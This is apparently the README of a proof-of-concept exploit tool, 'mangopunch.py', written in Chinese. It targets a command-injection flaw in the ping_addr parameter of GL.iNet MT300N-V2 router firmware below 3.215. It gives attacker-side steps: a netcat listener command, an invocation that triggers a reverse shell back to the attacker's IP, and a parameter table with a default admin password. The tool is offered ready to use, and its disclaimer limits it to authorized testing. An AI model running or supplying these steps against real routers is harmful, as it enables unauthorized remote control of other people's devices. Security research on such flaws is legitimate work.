__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
本仓库包含针对 GL.iNet MT300N-V2(Mango)及运行固件版本低于 3.215 的其他型号中发现的**远程命令执行(RCE)**漏洞的技术验证代码(PoC)。
该缺陷存在于诊断 API 的 ping_addr 参数中,允许已认证的攻击者通过 shell 元字符(;)执行任意系统命令。
在攻击机(Kali Linux)上打开终端并启动 Netcat 监听器:
nc -lvnp 9292
使用以下命令触发反向 Shell:
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
| 参数 | 完整名称 | 描述 | 默认值 |
|---|---|---|---|
-R | --rhost | 远程目标 IP(路由器) | 必填 |
-P | --rport | Web 管理端口 | 443 |
-L | --lhost | 监听 IP(Kali/攻击机) | 必填 |
-l | --lport | 监听端口 | 必填 |
-p | --pwd | 管理员密码 | goodlife |
-t | --https | 启用 HTTPS | False |
免责声明:此工具仅用于教育和授权安全测试目的。作者对任何滥用行为不承担责任。